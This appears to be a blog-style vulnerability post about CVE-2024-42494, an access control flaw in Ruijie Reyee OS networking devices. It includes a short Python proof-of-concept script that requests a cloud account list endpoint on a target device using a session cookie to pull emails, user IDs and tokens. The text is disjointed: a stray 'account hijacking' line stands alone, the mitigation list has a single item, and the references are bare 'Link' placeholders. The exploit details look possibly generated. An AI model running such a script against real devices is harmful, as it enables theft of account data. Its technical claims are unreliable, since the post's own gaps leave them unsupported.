CVE-2024-42494 is a critical vulnerability discovered in Ruijie Reyee OS, affecting versions 2.206.x up to but not including 2.320.x. This vulnerability was identified in a widely-used model of routers, switches, and access points developed by Ruijie Networks - a leading enterprise networking solution provider based in China.

The vulnerability enables unauthorized access to sensitive information stored in all cloud accounts registered to Ruijie's services, potentially allowing attackers to view and exfiltrate sensitive information. This post aims at providing in-depth insights into CVE-2024-42494, including the code snippet, original references, and exploit details so that users can understand the potential risk involved and take necessary security measures.

Technical Details

CVE-2024-42494 exists due to improper access control mechanisms in the Ruijie Reyee OS. This vulnerability allows the exposure of critical information when an attacker or a sub account gains access to the device's web management interface. The potential attacker doesn't require any special privileges, and the exploitation process is relatively simple.

Code Snippet

Below is a sample code snippet that demonstrates how the unauthorized information disclosure can be performed:

import requests

# Replace "TARGET_IP_ADDRESS" with the target device's IP address
url = "http://TARGET_IP_ADDRESS/api/v2/cloud/account/list";

# Replace "YOUR_COOKIE" with the value of your session cookie
cookies = {"session": "YOUR_COOKIE"}

response = requests.get(url, cookies=cookies)

if response.status_code == 200:
    print("Vulnerable: ", response.json())
else:
    print("Not Vulnerable")

By simply entering the target device's IP address and a valid session cookie, an attacker can run this script to access sensitive information related to cloud accounts connected to the same service. This includes information such as email addresses, user IDs, access tokens, and other critical data.

For more details on CVE-2024-42494, please refer to the following original references

1. Ruijie Networks Official Advisory: Link
2. National Vulnerability Database (NVD): Link

Account hijacking, leading to unauthorized changes in configurations

The simple nature of this exploit and the lack of required privileges make this vulnerability a significant risk. To protect against this exploit, users are advised to:

Regularly review security logs for any unusual activities.

In conclusion, CVE-2024-42494 is a critical vulnerability that can lead to unauthorized access and exfiltration of sensitive information
from Ruijie Reyee OS-powered devices. Users are advised to take necessary steps and mitigate the risks to protect their valuable data.

Timeline

Published on: 12/06/2024 18:15:24 UTC
Last modified on: 12/10/2024 18:38:23 UTC